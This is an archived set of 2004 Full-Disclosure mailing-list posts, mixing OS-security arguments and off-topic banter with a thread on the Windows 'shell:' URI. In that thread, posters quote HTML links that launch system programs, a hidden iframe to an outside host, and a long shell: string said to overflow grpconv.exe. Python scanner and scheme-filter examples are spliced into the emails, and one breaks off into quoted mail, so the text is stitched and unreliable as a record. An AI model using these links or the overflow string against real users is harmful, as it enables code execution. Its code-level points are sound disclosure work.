for instance. They build the client over 6 months and rush the coding.
Yahoo! care more about deadlines for projects, than checking
protocol's for potential vulnerabilities before release.

The end result? People get disconnected from Yahoo! Chat/Messenger or
have cookies stolen (because the system is handing them out, because
of obvious and petty flaws on protocol) and in the end, the consumer
loses the account to script kiddies.

Why sweep up from the aftermath of a major security incident due to
messy coding, when you can take an extra month on a project to review
potential vulnerabilities, saving everyone a lot of time and energy and
money in the long run.

If every vulnerability that Yahoo! has had and still has was disclosed
on Full-Disclosure, they'd look just as bad as Microsoft do at the
moment.

Geoffery loves my e-penis.


Cheerio

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] IE Web Browser: Sitting Duck

2004-07-07 Thread Bruce Ediger
On Wed, 7 Jul 2004, joe wrote:

 because the *nixs are picking up a lot of the people who were previously
 clueless in Windows and they aren't learning much going to *nix. They just
 think it is better and more secure because they know even less about it than
 they did about Windows.

At least in practice the unix-a-likes demonstrate more security than
the flavors of Windows, don't they?

I mean, where's the linux chain mailer to equal SirCam?

Where are the multiple linux worms to equal Code Red, Nimda, Deloder,
Witty, SQL Spida, Slammer, Blaster, MyDoom, etc etc etc?

Even if the installed bases are taken into account, Linux should suffer
from one or two persistent worms like Code Red (I got hits from Code Red
for more than two years after it was released), close to 100 file
viruses, and a few chain mailers.

Linux doesn't.  Sure, Staog and Bliss made appearances, Scalper and Slapper
made the rounds and a whole raft of mass-mailers...

Well, Staog, Bliss, Scalper and Slapper happened.

The evidence seems to suggest that Linux is more secure than Windows,
particularly in whatever ways cause susceptibility to mass-mailers.

Can you propose a test of the install-based theory?  If not, I wish
you wouldn't use it, it's little more than special pleading for the
use of Microsoft products.



Re: [Full-Disclosure] Wendy's Drive-up Order System Information Disclosure

2004-07-07 Thread Mr. Rufus Faloofus
On Wed, Jul 07, 2004 at 07:40:59AM -0400, Rob Keown wrote:
 Wendy's is rapidly preparing a fix, which involves PGP PKI. You *will* have
 to email your public key to Wendy's in order to submit or confirm your
 order.

I've heard that whether or not you need PGP depends on your condiment
selection.  For example, if you skip the generic mayo, and are willing
to pay a little extra for Diffie-Hellman's, I think you're OK.  On the
other hand, I think they might be abandoning french fries as a side 
order, and switching to Clipper chips, so maybe PGP isn't such a bad
idea after all.

--Foofus.



RE: [Full-Disclosure] IE Web Browser: Sitting Duck

2004-07-07 Thread Glenn_Everhart
Actually many games in Fortran appeared on DECUS sigtapes and
library media over the years. Pacman, invaders, adventure, many more.

The ones I recall used VT100 graphics but were eminently playable. Even
a version of the original Spacewar was at one time available in Fortran.
(I used to have it on tape, but bit rot got to it.)

For those not in the know, Spacewar had at least 2 rockets in the vicinity
of a sun. They could rotate right or left, accelerate in the direction they
were pointing, or fire torpedoes. Some versions had homing torpedoes
and/or hyperspace (the hyperspace generators are unreliable so every time
you enter hyperspace you have a fraction, something like 1/7, chance of appearing
and immediately exploding on reentry to normal space.) Also homing torpedoes
were slower than normal ones. Ships got a finite number of torpedoes and ships
and torpedoes were subject to gravity. It was/is a good game.


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of Dave
Horsfall
Sent: Wednesday, July 07, 2004 2:17 AM
To: Full Disclosure List
Subject: RE: [Full-Disclosure] IE Web Browser: Sitting Duck


On Wed, 7 Jul 2004, joe wrote:

 Of course you had FORTRAN and COBOL as well but you couldn't do fun
 games in those.

You mean like Adventure?  I still have the original FORTRAN source for
that somewhere on a tape.

-- Dave



**
This transmission may contain information that is privileged, confidential and/or 
exempt from disclosure under applicable law. If you are not the intended recipient, 
you are hereby notified that any disclosure, copying, distribution, or use of the 
information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. 
If you received this transmission in error, please immediately contact the sender and 
destroy the material in its entirety, whether in electronic or hard copy format. Thank 
you
**



[Full-Disclosure] VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!!

2004-07-07 Thread Frog Man
This mail was a fake again :
http://lists.netsys.com/pipermail/full-disclosure/2004-July/023409.html
I suppose those mails are made by a team named No.Disclosure.
I'm sorry for them.
bye
Germain Randaxhe aka [EMAIL PROTECTED]


Re: [Full-Disclosure] IE Web Browser: Sitting Duck

2004-07-07 Thread Barry Fitzgerald
joe wrote:
It is a core component of the current Windows UI, this is not the same as
being a core component of Windows. Explorer is simply a UI shell that sits
on the operating system known as Windows. The entire shell is replaceable
and has been for a long time, since at least Win3.1. 

 

I appreciate the technical explanation even though I knew, well, all and 
more of it.

You probably could have saved some time if you had read my relatively 
short message fully and seen that I did acknowledge that IE is not part 
of the kernel (which is really what you're trying to say) and that it's 
a part of MS Windows as a software distribution.  I'm fully aware that 
you can replace the shell in windows.

However, IE and the windows UI is a part of MS Windows as a software 
distribution and it's an essential part.  I dare say that if you remove 
the UI and DLLs of MS Windows, all you have left is a relatively crappy 
kernel with a lot of software that won't work. 

The MS Windows UI and Internet Explorer are a core part of the MS 
Windows operating system.  When you remove them, you break compatibility 
with many of the available programs and I'd venture to say that 
Microsoft would not support a highly modified system like the ones that 
you're describing. 

One can remove the Glibc from any GNU/Linux distribution.  I wish them 
luck trying to run programs that are dynamically linked. 

Is the Glibc a core part of Linux the kernel?  Of course not.
Is the Glibc a core part of the GNU/Linux OS distribution?  Yes, it is.
I think that for all of the technical explanations that you've given, 
you're losing the argument on one simple phrase: software distribution.

   -Barry
p.s. Come on people.  We went through the what does an OS really 
constitute? argument back in like 1996.  This isn't bloody kindergarten.



RE: [Full-Disclosure] IE Web Browser: Sitting Duck

2004-07-07 Thread Andrew Poodle




 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Bruce Ediger
 Sent: 07 July 2004 13:41
 To: [EMAIL PROTECTED]
 Subject: [EMAIL PROTECTED] - Email found in subject - RE: 
 [Full-Disclosure] IE Web Browser: Sitting Duck
snip
 At least in practice the unix-a-likes demonstrate more 
 security than the flavors of Windows, don't they?
 
 I mean, where's the linux chain mailer to equal SirCam?
 
 Where are the multiple linux worms to equal Code Red, Nimda, 
 Deloder, Witty, SQL Spida, Slammer, Blaster, MyDoom, etc etc etc?
snip 
 The evidence seems to suggest that Linux is more secure than 
 Windows, particularly in whatever ways cause susceptibility 
 to mass-mailers.

The evidence thus far does seem to suggest that linux and such is more
secure than Windows, but to that extent is that down to...
1: technical knowhow of the userbase tends to be higher, leading to the
correct updating, patching, firewalling and general configuration of
the machines
2: the %age of linux based machines in use, meaning it's a small enough
userbase that it's of a relatively low interest to those malicious
coders out there.

I'm sure that as the userbase of linux increases, and on average,
dumbs-down, so will the number of attempts at devising linux specific
trojans/exploits/viruses.

The nature of the linux OS means that it's likely that these will have
less impact than their existing MS counterparts.

Despite MS being accused of security through obscurity by not
publicising loopholes quick enough, it's ironic that Linux benefits from
a bit of security through obscurity due to its relatively small desktop
userbase.

Incidentally, I use both OS' regularly on my personal laptop (dual boot
Win XP Pro and SUSE Linux), although my development box at home is
Fedora Core 1, and I work for a predominantly MS consultancy and
development house, so you could consider me well and truly on the
fence.

Regards

Andrew

--
Andrew Poodle
Consultant
IRW Solutions Group Ltd
17 Glasgow Road
Paisley
PA1 3QS

t: +44 (0) 141 842 1142
f: +44 (0) 141 842 1134
e: [EMAIL PROTECTED] 
w: www.irw.co.uk

-
IRW Solutions Group Ltd
IRW Platinum: Strategic Consultancy
IRW Focus Blue: e-Business Software Solutions
IRW Associates: Managed Services
-

This document should only be read by those persons to whom it is addressed and is not 
intended to be relied upon by any person without subsequent written confirmation of 
its contents. 
Accordingly  IRW  Solutions Group Ltd  disclaim all responsibility and accept no 
liability (including in negligence) for the consequences for any person acting, or 
refraining from acting, on such information prior to the receipt by those persons of 
subsequent written confirmation. 

If you have received this e-mail message in error, please notify us immediately. 
Please also destroy and delete the message from your computer. 

Any form of reproduction, dissemination, copying, disclosure, modification, 
distribution and/or publication of this e-mail message is strictly prohibited.



Re: [Full-Disclosure] IE Web Browser: Sitting Duck

2004-07-07 Thread Pete Fanning
Actually TRS-DOS is still superior to all-y'all's stupid OS's!

So there!

:)

Ducking

---
Pete Fanning
MATC Technical Services
Internet: [EMAIL PROTECTED]


 Barry Fitzgerald [EMAIL PROTECTED] 7/7/2004 8:55:50 AM 
p.s. Come on people.  We went through the what does an OS really 
constitute? argument back in like 1996.  This isn't bloody
kindergarten.



RE: [Full-Disclosure] IE Web Browser: Sitting Duck

2004-07-07 Thread joe
Holy crap, I can not believe I totally forgot about adventure... 

We took it straight away and ported it to BASIC-PLUS because on RSTS/E that
was one of the RTSs (shell if you will) and was interpreted so we could
change it without sending it to batch overnight for the compile like we had
to do with F77. One of my CompSci instructors wanted me to rewrite it in
Macro for my MASM final project to show it could be done. I kept showing him
the code along the way and he was quite surprised when it actually ended up
being a Reverse-Polish functional scientific calculator complete with
graphics on the VT-52 when I handed it in. I always had a feeling he didn't
really know what he was reading when looking at code, especially MASM, that
was the final proof. :o)

  joe


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Dave Horsfall
Sent: Wednesday, July 07, 2004 2:17 AM
To: Full Disclosure List
Subject: RE: [Full-Disclosure] IE Web Browser: Sitting Duck

On Wed, 7 Jul 2004, joe wrote:

 Of course you had FORTRAN and COBOL as well but you couldn't do fun 
 games in those.

You mean like Adventure?  I still have the original FORTRAN source for that
somewhere on a tape.

-- Dave



Re: [Full-Disclosure] Wendy's Drive-up Order System Information Disclosure OT

2004-07-07 Thread Michael Gargiullo
McDonalds, Wendys and Burger King use(d) regular business bands for
their headset.

As a kid with access to HAM radio equipment, we'd sit in the parking lot
and act as a 'go between' for them.  Many an order turned up completely
wrong.  Watching the kid in the drive through wonder why someone else is
answering 'Hi welcome to Wendy's, can I take your order please'...

Man... we were bored kids...



RE: [Full-Disclosure] IE Web Browser: Sitting Duck

2004-07-07 Thread joe
I don't think anyone can propose a realistic test at this point in time. I
don't think one is possible until you get some sort of large non-techno
weenie installed based going for the *nix or another OS for that matter. As
another poster pointed out, the diversity and chaos in the open source world
right now helps contribute to its safety as there is no large exposed
surface in terms of Microsoft large. Plus MS simply makes good news. 

Once more non-weenies hit the OS and start doing things, something will
start to take a majority because friends will tell their other friends about
this specific version and the people running it won't be of the type to keep
swapping things around and trying other things and someone will come up with
some decent marketing or distribution method that appeals to the mass
market. In terms of marketing and distribution right now from what I see
that could very well be Lindows aka Linspire. I'm waiting for them to start
giving away Lindows PCs to schools actually like Apple did/does. They have
Apple beat because while a school could get it cheap, little billy at home
wasn't so lucky as mom and dad looked at the price in the store and said no
way. Do that with Lindows PCs, then mom and dad go to Walmart because billy
talks about how he likes it so much and lo and behold they see on shelf a
whole PC for $300 or so dollars. Hopefully they keep Lindows on it instead
of realizing, hey this isn't what mommy and daddy like and go to ebay and
buy a pirated copy of XP that can't be updated with security fixes because
MS in its infinite wisdom decided that people who don't buy legit don't get
to have security. You want to complain about MS, complain about that.  

I can say in my experience that I have seen fewer RSTS/E worms and viruses
than *nix but it doesn't mean it is more secure. At that point though there
weren't lists going around distributing the holes to the kids to exploit and
people going oh my god, DEC is evil, RSTS/E sucks, SunOS is MUCH better and
more secure. If we found a really bad issue, we would tell DEC and we would
tell any companies we were friendly with that we knew were running the same
thing.  I guess we weren't quite as religious then. If we wanted religion,
we went to church. We simply used computers to do our jobs.

  joe
 



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Bruce Ediger
Sent: Wednesday, July 07, 2004 8:41 AM
To: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] IE Web Browser: Sitting Duck

SNIP

Can you propose a test of the install-based theory?  If not, I wish you
wouldn't use it, it's little more than special pleading for the use of
Microsoft products.



RE: [Full-Disclosure] IE Web Browser: Sitting Duck

2004-07-07 Thread joe
Actually MS does support the use of alternative shells. However you couldn't
and shouldn't expect that if you have a say Thunderbird shell that MS would
support that shell, just the pinnings under it. Just like they don't support
say, Lotus, but they do support the underlying OS API calls. 

As for breaking things, it goes back to the same DLL point. If an app is
built on the concept that that shell would be there and has dependencies on
it, yes it will break. The only thing I can say to that is yeah, of course.
Most of the GUI admin tools from MS depend on those shell dependencies,
again, to that I say... Of course. However if you want to write your own,
you can. The Windows API core pieces are still there and fully exposed and
you don't have to use the Shell API calls and avoid the Shell DLLs. It will
take you a bit longer to write anything though I would expect unless you
have already built up your own lib.

There are many embedded and POS and other machines running Windows and not
using the Explorer shell. They are still called Windows machines. 

  joe

 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Barry
Fitzgerald
Sent: Wednesday, July 07, 2004 9:56 AM
To: joe
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] IE Web Browser: Sitting Duck

joe wrote:

It is a core component of the current Windows UI, this is not the same 
as being a core component of Windows. Explorer is simply a UI shell 
that sits on the operating system known as Windows. The entire shell is 
replaceable and has been for a long time, since at least Win3.1.

  


I appreciate the technical explanation even though I knew, well, all and
more of it.

You probably could have saved some time if you had read my relatively short
message fully and seen that I did acknowledge that IE is not part of the
kernel (which is really what you're trying to say) and that it's a part of
MS Windows as a software distribution.  I'm fully aware that you can replace
the shell in windows.

However, IE and the windows UI is a part of MS Windows as a software
distribution and it's an essential part.  I dare say that if you remove the
UI and DLLs of MS Windows, all you have left is a relatively crappy kernel
with a lot of software that won't work. 

The MS Windows UI and Internet Explorer are a core part of the MS Windows
operating system.  When you remove them, you break compatibility with many
of the available programs and I'd venture to say that Microsoft would not
support a highly modified system like the ones that you're describing. 

One can remove the Glibc from any GNU/Linux distribution.  I wish them luck
trying to run programs that are dynamically linked. 

Is the Glibc a core part of Linux the kernel?  Of course not.

Is the Glibc a core part of the GNU/Linux OS distribution?  Yes, it is.

I think that for all of the technical explanations that you've given, you're
losing the argument on one simple phrase: software distribution.

-Barry

p.s. Come on people.  We went through the what does an OS really
constitute? argument back in like 1996.  This isn't bloody kindergarten.



[Full-Disclosure] shell:windows command question

2004-07-07 Thread Perrymon, Josh L.
-snip-- 
centerbrbrimg src=nocigar.gif/center 
center
a href=shell:windows\snakeoil.txtwho goes there/a/center iframe
src=http://windowsupdate.microsoft.com%2F.http-
equiv.dyndns.org/~http-equiv/b*llsh*t.html style=display:none
[customise as you see fit]
http://www.malware.com/stockpump.html
--end--
The code above has interest to me. 
Even in Mozilla the commands below will work.
<a href="shell:windows\\system32\\calc.exe">1</a>
<a href="shell:windows\system32\calc.exe">2</a>
<a href="shell:windows\system32\winver.exe">4</a>
Just save them to an .html file and run it.
The first one with the double quotes was from bugtraq: 
Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash 
http://seclists.org/lists/bugtraq/2004/Mar/0188.html
The links below that will run calc as well as winver. 
It seems it calls windows as a virtual dir because c:\winxp is what I have.
I have been playing around to see if cmd.exe will work with it but without
luck.
This is what is in the registry.
HKEY_CLASSES_ROOT\Shell
Look in the registry key above. You will find the shell object calls Windows
Explorer with a particular set of arguments. 
%SystemRoot%\Explorer.exe /e,/idlist,%I,%L
So this is tied to explorer.exe. This is something involved with the
underlying functions of windows
and not IE so to speak because it works in Mozilla or from the run line.
I'm trying to find out more about the shell: command because I can put a
link on a site that seems to run anything
in system32 dir. I'd like to see if you can pass parameters to it.

Anyone give me more info on the shell:windows command?
JP


Joshua Perrymon
Sr. Network Security Consultant
PGP Fingerprint
51B8 01AC E58B 9BFE D57D  8EF6 C0B2 DECF EC20 6021

**CONFIDENTIALITY NOTICE**
The information contained in this e-mail may be proprietary and/or 
privileged and is intended for the sole use of the individual or 
organization named above.  If you are not the intended recipient or an 
authorized representative of the intended recipient, any review, copying
or distribution of this e-mail and its attachments, if any, is prohibited.
If you have received this e-mail in error, please notify the sender
immediately by return e-mail and delete this message from your system.
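A gateway-side check for the shell: links Josh describes, as an added example that is not code from his post or from the Bugtraq report it cites: a Python scanner that walks the HTML of a mail body or proxied page and reports every URL-bearing attribute whose scheme, after trimming whitespace and percent-decoding, is shell:. The sample HTML is constructed for this example and reuses the calc.exe and winver.exe links quoted above; the attribute list and the normalisation steps are my own choices. Since the post notes the links work from Mozilla as well as from the IE/run line, filtering them where mail and web content enter the network is more dependable than relying on any one browser to refuse the scheme.

```python
"""Flag shell: URIs in HTML content.  Added example; not code from the post."""
from html.parser import HTMLParser
from urllib.parse import unquote

# Attributes a browser or mail client will dereference (my choice for this example).
URL_ATTRIBUTES = {"href", "src", "action", "data", "formaction", "background"}


def is_shell_uri(value):
    """True when the attribute value resolves to the shell: scheme.

    Percent-decoding and whitespace removal catch the easy evasions
    ('shell%3A', ' SHELL :') that a plain prefix check would miss."""
    decoded = unquote(value)
    cleaned = "".join(ch for ch in decoded if not ch.isspace() and ch.isprintable())
    return cleaned.lower().startswith("shell:")


class ShellUriFinder(HTMLParser):
    """Collects (tag, attribute, raw value) for every flagged attribute.

    Self-closing tags such as <img ... /> reach handle_starttag as well."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is not None and name in URL_ATTRIBUTES and is_shell_uri(value):
                self.findings.append((tag, name, value))


def find_shell_uris(html):
    """Return the list of (tag, attribute, value) hits for one document."""
    parser = ShellUriFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample; the calc.exe/winver.exe hrefs mirror the links quoted in the post.
SAMPLE_HTML = """<html><body>
<a href="https://example.test/login">ordinary link</a>
<a href="shell:windows\\system32\\calc.exe">2</a>
<a href=" SHELL:windows\\system32\\winver.exe">4</a>
<a href="shell%3Awindows\\system32\\calc.exe">percent-encoded</a>
<iframe src="shell:windows\\system32\\calc.exe" style="display:none"></iframe>
<img src="nocigar.gif">
</body></html>"""


def main():
    for tag, attr, value in find_shell_uris(SAMPLE_HTML):
        print(f"blocked: <{tag} {attr}={value!r}>")


if __name__ == "__main__":
    main()
```

On the sample the scanner reports four hits (three anchors and the hidden iframe) and passes the ordinary https link and the image. A content filter would strip or quarantine on any hit; the raw attribute value is kept in the finding so the log shows exactly what was blocked.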





RE: [Full-Disclosure] Adventure Outlook mail problem.IE Web Browser: Sitting Duck

2004-07-07 Thread Clairmont, Jan M
i played adventure for the first time in 1975, Sept.

my greatest achievement at UW, was that for one month I was the
Adventure champion closing the cave in the fewest moves.
I got lucky, it drove the sysadmin, Unix research version 2.2,
crazy, until he hacked the source and found all the keywords for
zipping around the cave. Plugh! Y2 away daddy and don't cross
the bridge with the bear.

What's the oldest unix version you worked on, Unix  research version 2.2, my first 
printf Hello world.\n  in C, and my
first echo -n login: . The first read login, echo $login $passwd to my file.  8- 
Nothing has changed really.  What your first Unix version for the Guiness Book of 
records?

There is a mail vulnerabilty for exchange anyone know the new 
one out there, it keeps sending broadcast messages from 
users.  No sweeper seems to have picked it up.  Anyone experiencing similar annoying 
problems with outlook and mail?
i can't be too specific, not my yob per se, i build virevalls.

You're in a twisty maze, that's all alike or was it all different?

Jan Clairmont, Paladin of Security, KMGO
Firewall Administrator/Consultant


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of
[EMAIL PROTECTED]
Sent: Wednesday, July 07, 2004 8:54 AM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] IE Web Browser: Sitting Duck


Actually many games in Fortran appeared on DECUS sigtapes and
library media over the years. Pacman, invaders, adventure, many more.

The ones I recall used VT100 graphics but were eminently playable. Even
a version of the original Spacewar was at one time available in Fortran.
(I used to have it on tape, but bit rot got to it.)

For those not in the know, Spacewar had at least 2 rockets in the vicinity
of a sun. They could rotate right or left, accelerate in the direction they
were pointing, or fire torpedoes. Some versions had homing torpedoes
and/or hyperspace (the hyperspace generators are unreliable so every time
you enter hyperspace you have a fraction, something like 1/7, chance of appearing
and immediately exploding on reentry to normal space.) Also homing torpedoes
were slower than normal ones. Ships got a finite number of torpedoes and ships
and torpedoes were subject to gravity. It was/is a good game.


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of Dave
Horsfall
Sent: Wednesday, July 07, 2004 2:17 AM
To: Full Disclosure List
Subject: RE: [Full-Disclosure] IE Web Browser: Sitting Duck


On Wed, 7 Jul 2004, joe wrote:

 Of course you had FORTRAN and COBOL as well but you couldn't do fun
 games in those.

You mean like Adventure?  I still have the original FORTRAN source for
that somewhere on a tape.

-- Dave

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html





RE: [Full-Disclosure] Adventure Outlook mail problem.IE Web Browser: Sitting Duck

2004-07-07 Thread full-disclosure
i played adventure for the first time in 1975, Sept.

my greatest achievement at UW, was that for one month I was the
Adventure champion closing the cave in the fewest moves.
bla bla bla bla bla

http://www.graphicupstart.com/clients/misc/stfu.jpg

Thank you



Re: [Full-Disclosure] shell:windows command question

2004-07-07 Thread Andreas Sandblad
This is dangerous. Based on the file extension of the shell protocol
different applications may be launched. For example:
shell:.its will launch Internet Explorer
and shell:.mp3 will launch Winamp.

The trick is to find an application that will overflow when given a
very long parameter. A quick check showed that a buffer overflow occurred
within MSProgramGroup (WINDOWS\System32\grpconv.exe) after around 230
bytes with the following URL:
shell:[x*221].grp
EIP can be controlled, but exploitation is a bit tricky since the parameter is
stored as unicode.

Also Winamp contains a BO (no unicode here).

Tested environment:
Windows XP pro + FireFox 0.9.1

/Andreas Sandblad

On Wed, 7 Jul 2004, Perrymon, Josh L. wrote:

 -snip--
 <center><br><br><img src="nocigar.gif"></center>
 <center>
 <a href="shell:windows\snakeoil.txt">who goes there</a></center> <iframe
 src="http://windowsupdate.microsoft.com%2F.http-
 equiv.dyndns.org/~http-equiv/b*llsh*t.html" style="display:none">
 [customise as you see fit]
 http://www.malware.com/stockpump.html
 --end--
 The code above has interest to me.
 Even in Mozilla the commands below will work.
 <a href="shell:windows\\system32\\calc.exe">1</a>
 <a href="shell:windows\system32\calc.exe">2</a>
 <a href="shell:windows\system32\winver.exe">4</a>
 Just save them to an .html file and run it.
 The first one with the double quotes was from bugtraq:
 Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash
 http://seclists.org/lists/bugtraq/2004/Mar/0188.html
 The links below that will run calc as well as winver.
 It seems it calls windows as a virtual dir because c:\winxp is what I have.
 I have been playing around to see if cmd.exe will work with it but without
 luck.
 This is what is in the registry.
 HKEY_CLASSES_ROOT\Shell
 Look in the registry key above. You will find the shell object calls Windows
 Explorer with a particular set of arguments.
 %SystemRoot%\Explorer.exe /e,/idlist,%I,%L
 So this is tied to explorer.exe. This is something involved with the
 underlying functions of windows
 and not IE so to speak because it works in Mozilla or from the run line.
 I'm trying to find out more about the shell: command because I can put a
 link on a site that seems to run anything
 in system32 dir. I'd like to see if you can pass parameters to it.

 Anyone give me more info on the shell:windows command?
 JP


 Joshua Perrymon
 Sr. Network Security Consultant
 PGP Fingerprint
 51B8 01AC E58B 9BFE D57D  8EF6 C0B2 DECF EC20 6021






-- 
Andreas Sandblad
Sweden



RE: [Full-Disclosure] What a difference a char makes...

2004-07-07 Thread joe
Thanks Nick, you should find this corrected now.

  joe 



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Nick FitzGerald
Sent: Saturday, July 03, 2004 1:00 AM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Subject: [Full-Disclosure] What a difference a char makes...

MS does it again...

I'm not sure whether to laugh or cry.

   http://www.microsoft.com/security/incident/Download_Ject.mspx

   ...

   Actions for Home Users

   ...

   2. Check for Infection

   ...

  3.  At the command prompt, type:
  dir /a /s /b &systemdrive%\kk32.dll
  and then press the ENTER key to search your
  computer.
  If the file is present, the file path is displayed. If
  the file is not present, a message is displayed
  that the system cannot find the path.

There's no prize for spotting the typo, nor for guessing what your typical
home user's reaction will be if they actually follow this advice.

On reflection, perhaps there should be a prize for the latter, as accurately
guessing that could be quite tricky.  Due to the error (repeated in step 4
-- the glories of cut'n'paste...) the user will receive a possibly quite
long directory listing (after all, at least on Win2K and XP the default
directory for the command prompt will be the current user's homepath
directory which houses, by default, as one of its many sub-directories, IE's
TIF) followed by the message, as the very last line of output:

   The system cannot find the path specified.

...

Does MS not employ technical writers?

What about tech reviewers?

What about the age-old publishing concept of having some vaguely clueful
person _who had nothing to do with the generation or layout of the content_
look critical new web pages over before publishing them? 
OK, so this is the web, but critical information still does not deserve an
attitude of "it's just the web", does it?

The odd spelling mistake on the Office or IIS marketing pages we may accept,
but getting something so badly wrong that anyone with two days experience of
real system administration would spot in an eye-blink _AND_ with such
potentially confusing results is pretty darn shoddy even by MS' own long
history of shoddy security standards...

Could it be worse?  Well, the page has not been posted long enough for
Google to have indexed it, yet...

I wonder when the first softie would have noticed this??

...

One final observation, ignoring that & has to be escaped in HTML markup
(encoded as an HTML entity in this case), this is actually the very smallest
of computer errors.  I said "What a difference a char makes..." in my
Subject: line, but this is really just a single bit error, as % is 0x25
and & 0x26.

Would it be too unkind to conclude that MS doesn't care one bit about
accuracy?


-- 
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854



Re: [Full-Disclosure] shell:windows command question

2004-07-07 Thread Barry Fitzgerald
I just verified this in Mozilla 1.7 on Windows XP pro.
(I know -- no reason why it shouldn't work on 1.7 if it worked on firefox)
In any case, it does appear to be an issue with MS Windows and not 
Mozilla, but the Mozilla project should still, IMO, filter out the 
shell: scheme type and other dangerous (but essentially useless on the 
web) scheme types identified in MS Windows.  In fact, they should filter 
all out except for accepted scheme types.  Default-closed as opposed to 
default-open.

-Barry
Andreas Sandblad wrote:
This is dangerous. Based on the file extension of the shell protocol
different applications may be launched. For example:
shell:.its will launch Internet Explorer
and shell:.mp3 will launch Winamp.
The trick is to find an application that will overflow when given a
very long parameter. A quick check showed that a buffer overflow occurred
within MSProgramGroup (WINDOWS\System32\grpconv.exe) after around 230
bytes with the following URL:
shell:[x*221].grp
EIP can be controlled, but exploitation is a bit tricky since the parameter is
stored as unicode.
Also Winamp contains a BO (no unicode here).
Tested environment:
Windows XP pro + FireFox 0.9.1
/Andreas Sandblad
On Wed, 7 Jul 2004, Perrymon, Josh L. wrote:
 

-snip--
<center><br><br><img src="nocigar.gif"></center>
<center>
<a href="shell:windows\snakeoil.txt">who goes there</a></center> <iframe
src="http://windowsupdate.microsoft.com%2F.http-
equiv.dyndns.org/~http-equiv/b*llsh*t.html" style="display:none">
[customise as you see fit]
http://www.malware.com/stockpump.html
--end--
The code above has interest to me.
Even in Mozilla the commands below will work.
<a href="shell:windows\\system32\\calc.exe">1</a>
<a href="shell:windows\system32\calc.exe">2</a>
<a href="shell:windows\system32\winver.exe">4</a>
Just save them to an .html file and run it.
The first one with the double quotes was from bugtraq:
Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash
http://seclists.org/lists/bugtraq/2004/Mar/0188.html
The links below that will run calc as well as winver.
It seems it calls windows as a virtual dir because c:\winxp is what I have.
I have been playing around to see if cmd.exe will work with it but without
luck.
This is what is in the registry.
HKEY_CLASSES_ROOT\Shell
Look in the registry key above. You will find the shell object calls Windows
Explorer with a particular set of arguments.
%SystemRoot%\Explorer.exe /e,/idlist,%I,%L
So this is tied to explorer.exe. This is something involved with the
underlying functions of windows
and not IE so to speak because it works in Mozilla or from the run line.
I'm trying to find out more about the shell: command because I can put a
link on a site that seems to run anything
in system32 dir. I'd like to see if you can pass parameters to it.
Anyone give me more info on the shell:windows command?
JP
Joshua Perrymon
Sr. Network Security Consultant
PGP Fingerprint
51B8 01AC E58B 9BFE D57D  8EF6 C0B2 DECF EC20 6021

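The default-closed filter Barry argues for, as an added example that is not Mozilla code and not code from any poster in this thread: a web client that follows only an explicit allowlist of URL schemes, so that OS-registered handlers like the shell: scheme from Perrymon's and Sandblad's posts are never dispatched. The allowlist and the sample page are constructed for the demo.

```python
"""Default-closed URL scheme filter for a web client.

Added example; this is not Mozilla code or code from any poster in the
thread. ALLOWED_SCHEMES and SAMPLE_PAGE are constructed for the demo.
"""
import re
from html.parser import HTMLParser

# Schemes the client has a reason to dispatch itself. Everything else,
# including "shell:", is refused instead of being handed to the OS.
ALLOWED_SCHEMES = frozenset({"http", "https", "ftp", "mailto"})

# RFC 3986 scheme syntax: ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ) ":"
_SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")


def extract_scheme(href):
    """Return the lower-cased scheme of href, or None for a relative reference.

    Surrounding whitespace is ignored and tab, CR and LF are removed anywhere,
    mirroring how lenient URL parsers behave, so the filter cannot be talked
    into seeing a different scheme than the navigation code does.
    """
    cleaned = href.strip().translate({9: None, 10: None, 13: None})
    match = _SCHEME_RE.match(cleaned)
    return match.group(1).lower() if match else None


def is_navigable(href):
    """Default-closed decision: only allowlisted schemes may be followed.

    A reference without a scheme is resolved against the current page and
    can only ever yield the page's own (already accepted) scheme.
    """
    scheme = extract_scheme(href)
    return scheme is None or scheme in ALLOWED_SCHEMES


class _HrefCollector(HTMLParser):
    """Collects every href attribute value in document order."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name == "href" and value is not None:
                self.hrefs.append(value)


def partition_hrefs(html):
    """Split the hrefs in an HTML fragment into (allowed, blocked) lists."""
    collector = _HrefCollector()
    collector.feed(html)
    collector.close()
    allowed = [h for h in collector.hrefs if is_navigable(h)]
    blocked = [h for h in collector.hrefs if not is_navigable(h)]
    return allowed, blocked


# Constructed page: shell: links like the ones in the thread, next to
# ordinary ones, including case and whitespace variants a filter must catch.
SAMPLE_PAGE = r"""
<a href="https://example.test/">site</a>
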